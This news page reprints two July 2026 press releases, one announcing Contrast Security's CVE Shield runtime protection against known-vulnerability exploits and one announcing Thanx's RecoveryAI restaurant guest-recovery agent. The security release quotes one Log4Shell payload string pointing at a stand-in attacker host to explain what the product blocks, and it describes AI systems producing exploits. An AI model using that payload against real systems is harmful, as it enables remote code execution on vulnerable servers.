Skip to Content Facebook Feature Image

Contrast Security Launches CVE Shield as AI Accelerates Exploitation of Known Vulnerabilities

Business

Contrast Security Launches CVE Shield as AI Accelerates Exploitation of Known Vulnerabilities
Business

Business

Contrast Security Launches CVE Shield as AI Accelerates Exploitation of Known Vulnerabilities

2026-07-29 18:00 Last Updated At:18:10

PLEASANTON, Calif.--(BUSINESS WIRE)--Jul 29, 2026--

Contrast Security, the leader in Application Detection and Response (ADR), today announced Contrast CVE Shield to stop the wave of AI-generated exploits made possible by frontier models like Claude Mythos.

This press release features multimedia. View the full release here: https://www.businesswire.com/news/home/20260729589171/en/

Contrast CVE Shield operates inside the running application, where it detects, monitors and prevents exploitation of known vulnerabilities. Legitimate library functions continue, while security teams get evidence showing which vulnerabilities are present, which are active, which are being attacked and which are kept safe.

Using a runtime microsandbox for each supported CVE, CVE Shield is a compensating control that gives organizations immediate protection while they test and deploy the permanent fix.

In April 2026, Anthropic reported that its Claude Mythos Preview research system could take a public CVE identifier and the corresponding Git commit and autonomously produce a working exploit inexpensively within a day. Within five weeks, OpenAI and Microsoft disclosed comparable vulnerability research systems.

“Organizations are standing up Mythos Task Forces because traditional patch cycles cannot keep pace with AI-generated exploits,” said Jeff Williams, Founder of Contrast Security and creator of the OWASP Top 10. “We created CVE Shield to give them immediate protection and buy security teams time between CVE disclosure and patch deployment. Legacy applications, vendor dependencies and frozen release windows no longer have to mean open exposure.”

Built for AI-speed exploitation

Traditional CVE management identifies the 5% of CVEs that actually matter in production and creates a remediation ticket. Teams still have to determine whether the vulnerable code is actually running, reachable, exploitable, and connected to a sensitive asset — and then protect the application while they test and deploy an update.

CVE Shield adds runtime protection while teams patch. Instead of trying to recognize every malicious payload, it blocks the capabilities an exploit must use to succeed, such as native code execution, remote class loading, and arbitrary file writes.

Because CVE Shield controls behavior rather than relying on payload signatures, new variations of a supported exploit hit the same protected boundary. No new signature is required.

Even when an attacker reaches vulnerable code with a working exploit, CVE Shield can stop the exploit from completing its intended action.

“Developers and security teams have long struggled to prioritize CVEs because traditional tools focus on vulnerable versions rather than real execution. Capabilities that connect CVE identification with runtime reachability and active protection represent an important step toward more operationally relevant application security.”

-Katie Norton, Senior Research Manager at IDC

The Log4Shell example

Let’s use Log4Shell as an example, because it is the most widely known CVE.

Log4Shell, tracked as CVE-2021-44228, is exploited by an attacker slipping a token like ${jndi:ldap://attacker.example/x} into request data that gets logged by an application or API, which triggers an outbound lookup that loads and runs attacker-controlled code.

CVE Shield wraps the vulnerable Log4j methods, so normal logging continues while the capabilities the exploit needs, the outbound JNDI lookup, remote class loading and process execution, are denied. The lookup never reaches the attacker's server and the malicious class never loads.

The vulnerable component keeps working. The exploit does not.

Engineered for production

CVE Shield is installed on your workloads with a single command and immediately begins identifying and protecting against CVE exploit attempts. It requires no additional appliance, proxy or sidecar.

CVE Shield is designed for maximum performance. There is no impact unless a CVE is exploited, and exploit prevention adds only 12 nanoseconds, making CVE Shield's performance impact almost immeasurable. It can be easily installed on a single host or across a large, diverse infrastructure.

Once the application starts, CVE Shield inventories its libraries and activates shields for vulnerable versions that match. The Contrast Agent Operator automates deployment across Kubernetes and OpenShift workloads without per-service code or Dockerfile changes.

CVE Shield also replaces vulnerability assumptions with runtime evidence. It shows security teams which vulnerable libraries are present, which vulnerable code paths are being exercised and when exploitation is attempted.

Teams can focus remediation efforts on real application risk rather than treating every entry in the backlog as equally urgent. Contrast provides dynamic risk scores for CVEs based on architectural, threat, and business context from production environments.

Availability

CVE Shield is part of Contrast Application Detection and Response. Its initial rollout brings localized CVE sandboxing to 60 critical Java vulnerabilities, including Log4Shell, Spring4Shell and Apache Commons Collections deserialization vulnerabilities. Contrast will expand coverage to additional high- and critical-severity CVEs, with new protections delivered continuously as vulnerabilities emerge. Support for Go, Node.js, .NET and Python is planned for the second half of 2026.

CVE Shield will be available on August 3, 2026, with a free tier, enabling AppSec teams to deploy to Java applications within minutes and gain immediate runtime visibility into active, supported CVEs.

Before August 3rd, you can sign up for the Contrast CVE Shield waitlist. After August 3rd, visit the Contrast CVE Shield registration page.

Key takeaways

About Contrast Security

Contrast Security is the global leader in Application Detection and Response (ADR), empowering organizations to see and stop attacks on applications and APIs in real time. Contrast embeds patented threat sensors directly into the software, delivering unmatched visibility and protection. With continuous defense, Contrast uncovers hidden application-layer risks that traditional solutions miss. Contrast’s powerful Runtime Security technology equips developers, AppSec teams and SecOps with one platform that proactively protects and defends applications and APIs against evolving threats.

At runtime, Contrast CVE Shield detected multiple CVEs across apps, scored their severity, and is now blocking malicious function calls, without disrupting normal app behavior.

At runtime, Contrast CVE Shield detected multiple CVEs across apps, scored their severity, and is now blocking malicious function calls, without disrupting normal app behavior.

SAN FRANCISCO--(BUSINESS WIRE)--Jul 29, 2026--

Thanx, the guest engagement and loyalty platform for growing restaurant brands, today announced RecoveryAI, an AI agent that automatically recovers guests who have a bad first-party digital ordering experience, in the moment it happens. Priced entirely on outcomes, RecoveryAI is the first time restaurants can turn guest recovery from a service cost into a revenue channel that scales with every order.

This press release features multimedia. View the full release here: https://www.businesswire.com/news/home/20260729338792/en/

Restaurant growth in 2026 is constrained by traffic, and the cheapest growth available is the guest a brand already has. When a digital order goes wrong, that guest usually leaves without a word, and the restaurant spends more to acquire a replacement. Recovering that guest is the highest-return growth opportunity in many businesses. It has simply never been something a restaurant could operate at scale, because it depended on people responding to problems in real time while juggling other tasks.

"The biggest growth opportunity in most restaurants is the guest who just had a bad experience and is about to leave. They already chose you once, and earning that next visit costs a fraction of finding someone new. The problem has always been that recovery depended on someone catching the moment, and no growing brand can staff for that. RecoveryAI turns that moment into a revenue channel that runs on its own."
— Zach Goldstein, Founder and CEO, Thanx

The behavior is well documented. Across more than two million guest interactions on the Thanx platform, a same-day resolution with the right gesture lifts 30-day return rates by 29 percent.

RecoveryAI recovers those guests automatically, in the moment an order goes wrong. Because it is built natively inside the brand's loyalty platform, it already knows each guest and tailors the response to the individual using the brand's own voice. Because brands pay only when a guest actually returns, the channel scales with order volume while cost stays tied to results.

"For years, guest recovery has been a cost center operators funded on faith. RecoveryAI changes that. Brands pay only when a guest actually comes back, which makes it less like buying software and more like the most efficient acquisition channel in their stack."
— Zach Goldstein, Founder and CEO, Thanx

RecoveryAI is the second AI product Thanx has brought to market in less than seven months, following SegmentAI. RecoveryAI is rolling out to Thanx customers now.

About Thanx

Thanx is the leading loyalty and guest engagement platform built for restaurants. We help brands drive profitable growth by increasing guest frequency, growing direct sales, and reducing reliance on discounts. Thanx unifies loyalty, digital ordering, and marketing automation into one platform designed to turn first-time guests into regulars and deliver measurable business outcomes. Headquartered in San Francisco, Thanx was founded in 2011.

When a guest’s first-party digital order goes wrong, RecoveryAI responds in real time with a personalized apology and reward. It recovers the guest before they walk away.

When a guest’s first-party digital order goes wrong, RecoveryAI responds in real time with a personalized apology and reward. It recovers the guest before they walk away.

Recommended Articles